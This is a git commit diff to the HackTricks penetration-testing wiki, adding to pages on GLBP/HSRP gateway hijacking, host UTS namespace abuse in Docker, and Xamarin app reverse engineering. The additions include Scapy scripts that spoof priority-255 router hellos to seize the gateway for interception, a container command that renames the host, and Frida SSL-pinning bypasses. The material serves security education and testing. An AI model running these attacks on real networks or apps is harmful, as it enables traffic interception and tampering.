Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

carlospolop · carlospolop · commit 923bafdc873b · 2026-02-06T11:13:22.000+01:00
diff --git a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md
@@ -13,6 +13,8 @@ FHRP is designed to provide network robustness by merging multiple routers into
 
 Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified.
 
+GLBP for IPv6 uses multicast **FF02::66** over UDP/3222, and the virtual MAC format becomes `0007.b4xx.xxyy` (AVF ID is in the last byte). Timing and attack surface remain the same as in IPv4, so hijack techniques still work in dual‑stack networks.
+
 ### GLBP Operations and Load Distribution
 
 GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms:
@@ -35,6 +37,20 @@ For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UD
 
 An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection.
 
+**Practical GLBP hijack with Scapy (short PoC)**
+
+```python
+from scapy.all import *
+
+vip = "10.10.100.254"          # learned from sniffing
+pkt = IP(dst="224.0.0.102")/UDP(dport=3222,sport=3222)/Raw(
+    b"\x01\x00\xff\x64"      # Version=1, Opcode=Hello, Priority=255, Weight=100
+)
+send(pkt, iface="eth0", loop=1, inter=1)
+```
+
+Craft the payload bytes to mimic the GLBP header (version/opcode/priority/weight/VRID). Looping the frame ensures you win the AVG election if authentication is absent.
+
 ### Executing a GLBP Attack with Loki
 
 [Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark.
@@ -75,6 +91,8 @@ Monitoring and intercepting traffic can be done using net-creds.py or similar to
 
 HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.
 
+HSRPv1 uses multicast **224.0.0.2** and virtual MAC `0000.0c07.acXX`; HSRPv2 and HSRPv2 for IPv6 use **224.0.0.102 / FF02::66** and virtual MAC `0000.0c9f.fXXX`. UDP destination port is **1985** for IPv4 and **2029** for IPv6.
+
 #### Roles and Terminology in HSRP
 
 - **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
@@ -91,6 +109,26 @@ HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacit
 
 HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
 
+**Quick HSRP takeover with Scapy**
+
+```python
+from scapy.all import *
+
+vip = "10.10.100.1"
+pkt = IP(dst="224.0.0.102")/UDP(sport=1985,dport=1985)/Raw(
+    b"\x00\x02\xff\x03\x00\x00\x00\x01"  # Hello, priority 255, group 1
+)
+send(pkt, iface="eth0", inter=1, loop=1)
+```
+
+If authentication is **not** configured, continuously sending hellos with higher priority forces peers into *Speak*/*Listen* states and lets you become *Active*, redirecting traffic through your host.
+
+**HSRP authentication corner cases**
+
+- Legacy plain-text auth is trivially spoofable.
+- MD5 authentication only covers the HSRP payload; crafted packets can still rate-limit/DoS control planes. NX-OS releases previously allowed DoS against authenticated groups (see Cisco advisory CSCup11309).
+- On many ISP / VPS shared VLANs, HSRPv1 multicasts are visible to tenants; without auth you can join and preempt traffic.
+
 #### Steps for Bypassing HSRP Authentication
 
 1. Save the network traffic containing HSRP data as a .pcap file.
@@ -135,9 +173,6 @@ Executing these steps places the attacker in a position to intercept and manipul
 ## References
 
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-
-
+- [Cisco NX-OS HSRP authentication DoS (CSCup11309)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20140611-CVE-2014-3295)
+- [Reddit: HSRP seen on VPS shared VLANs](https://www.reddit.com/r/networking/comments/1h0v1aq/hsrp_seen_on_cloud_vlans_without_auth/)
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
@@ -75,7 +75,22 @@ sudo find /proc -maxdepth 3 -type l -name uts -exec ls -l  {} \; 2>/dev/null | g
 nsenter -u TARGET_PID --pid /bin/bash
 ```
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## Abusing host UTS sharing
+
+If a container is started with `--uts=host`, it joins the host UTS namespace instead of getting an isolated one. With capabilities such as `--cap-add SYS_ADMIN`, code in the container can change the host hostname/NIS name via `sethostname()`/`setdomainname()`:
+
+```bash
+docker run --rm -it --uts=host --cap-add SYS_ADMIN alpine sh -c "hostname hacked-host && exec sh"
+# Hostname on the host will immediately change to "hacked-host"
+```
 
+Changing the host name can tamper with logs/alerts, confuse cluster discovery or break TLS/SSH configs that pin the hostname.
 
+### Detect containers sharing UTS with the host
 
+```bash
+docker ps -aq | xargs -r docker inspect --format '{{.Id}} UTSMode={{.HostConfig.UTSMode}}'
+# Shows "host" when the container uses the host UTS namespace
+```
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/xamarin-apps.md b/src/mobile-pentesting/xamarin-apps.md
@@ -34,20 +34,37 @@ To access the assemblies in an APK/IPA, unzip the file and explore the assemblie
 python3 xamarin-decompress.py -o /path/to/decompressed/apk
 ```
 
-In cases where after decompiling the APK it's possible to see the unknown/assemblies/ folder with the `.dll` files inside it, so it's posible to use [**dnSpy**](https://github.com/dnSpy/dnSpy) directly over the `.dlls` to analyze them.\
-However, sometimes, it's found the `assemblies.blob` and `assemblies.manifest` files inside the unknown/assemblies/ folder. The tool [pyxamstore](https://github.com/jakev/pyxamstore) can be used for unpacking the `assemblies.blob` file in Xamarin apps, allowing access to the .NET assemblies for further analysis:
+In cases where after decompiling the APK it's possible to see the unknown/assemblies/ folder with the `.dll` files inside it, it's possible to use [**dnSpy**](https://github.com/dnSpy/dnSpy) directly over the `.dlls` to analyze them. However, sometimes the `assemblies.blob` and `assemblies.manifest` files are inside the unknown/assemblies/ folder. The tool [pyxamstore](https://github.com/jakev/pyxamstore) can unpack the `assemblies.blob` file in Xamarin apps, allowing access to the .NET assemblies for further analysis:
 
 ```bash
 pyxamstore unpack -d /path/to/decompressed/apk/assemblies/
+# After patching DLLs, rebuild the store
+pyxamstore pack
+```
+
+Some recent Xamarin/MAUI builds store compressed assemblies using the **XALZ** format inside `/assemblies.blob` or `/resources/assemblies`. You can quickly decompress them with the [xamarout](https://pypi.org/project/xamarout/) library:
+
+```python
+from xamarout import xalz
+import os
+for root, _, files in os.walk("."):
+    for f in files:
+        if open(os.path.join(root, f), 'rb').read(4) == b"XALZ":
+            xa = xalz.XamarinCompressedAssembly(os.path.join(root, f))
+            xa.write("decompressed/" + f)
 ```
 
 iOS dll files are readily accessible for decompilation, revealing significant portions of the application code, which often shares a common base across different platforms.
 
+> **AOT on iOS**: managed IL is compiled into native `*.aotdata.*` files. Patching the DLL alone will not change logic; you need to hook native stubs (e.g., with Frida) because the IL bodies are empty placeholders.
+
 ### Static Analysis
 
-Once the `.dll`s are obtained it's possible to analyze the .Net code statically using tools such as [**dnSpy**](https://github.com/dnSpy/dnSpy) **or** [**ILSpy**](https://github.com/icsharpcode/ILSpy) **t**hat will allow to modify the code of the app. This can be super useful to tamper the application to bypass protections for example.\
+Once the `.dll`s are obtained it's possible to analyze the .Net code statically using tools such as [**dnSpy**](https://github.com/dnSpy/dnSpy) or [**ILSpy**](https://github.com/icsharpcode/ILSpy) that will allow modifying the code of the app. This can be super useful to tamper the application to bypass protections for example.\
 Note that after modifying the app you will need to pack it back again and sign it again.
 
+> dnSpy is archived; maintained forks like **dnSpyEx** keep working with .NET 8/MAUI assemblies and preserve debug symbols when re-saving.
+
 ### Dynamic Analysis
 
 Dynamic analysis involves checking for SSL pinning and using tools like [Fridax](https://github.com/NorthwaveSecurity/fridax) for runtime modifications of the .NET binary in Xamarin apps. Frida scripts are available to bypass root detection or SSL pinning, enhancing analysis capabilities.
@@ -58,17 +75,36 @@ Other interesting Frida scripts:
 - [**xamarin-root-detect-bypass**](https://codeshare.frida.re/@nuschpl/xamarin-root-detect-bypass/)
 - [**Frida-xamarin-unpin**](https://github.com/GoSecure/frida-xamarin-unpin)
 
+Updated **Frida-xamarin-unpin** (Mono >=6) hooks `System.Net.Http.HttpClient.SendAsync` and swaps the handler to a permissive one, so it still works even when pinning is implemented in custom handlers. Run it after the app starts:
+
+```bash
+frida -U -l dist/xamarin-unpin.js com.target.app --no-pause
+```
+
+Quick template to hook managed methods with the bundled `frida-mono-api`:
+
+```javascript
+const mono = require('frida-mono-api');
+Mono.ensureInitialized();
+Mono.enumerateLoadedImages().forEach(i => console.log(i.name));
+const klass = Mono.classFromName("Namespace", "Class");
+const m = Mono.methodFromName(klass, "Method", 2);
+Mono.intercept(m, { onEnter(args){ console.log(args[1].toInt32()); } });
+```
+
 ### Resigning
 
 The tool [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) simplifies signing multiple APKs with the same key, and can be used to resign an app after changes have been performed to it.
 
-## Further information
+## References
 
 - [https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers](https://www.appknox.com/security/xamarin-reverse-engineering-a-guide-for-penetration-testers)
 - [https://thecobraden.com/posts/unpacking_xamarin_assembly_stores/](https://thecobraden.com/posts/unpacking_xamarin_assembly_stores/)
 - [https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf](https://medium.com/@justmobilesec/introduction-to-the-exploitation-of-xamarin-apps-fde4619a51bf)
+- [https://github.com/jakev/pyxamstore](https://github.com/jakev/pyxamstore)
+- [https://pypi.org/project/xamarout/](https://pypi.org/project/xamarout/)
+- [https://github.com/GoSecure/frida-xamarin-unpin](https://github.com/GoSecure/frida-xamarin-unpin)
+- [https://gist.github.com/Diefunction/e26fce039efcab57aac342a4b2d48ff6](https://gist.github.com/Diefunction/e26fce039efcab57aac342a4b2d48ff6)
+- [https://reverseengineering.stackexchange.com/questions/31716/deobfuscating-ios-dll-file-i-think-arm64](https://reverseengineering.stackexchange.com/questions/31716/deobfuscating-ios-dll-file-i-think-arm64)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
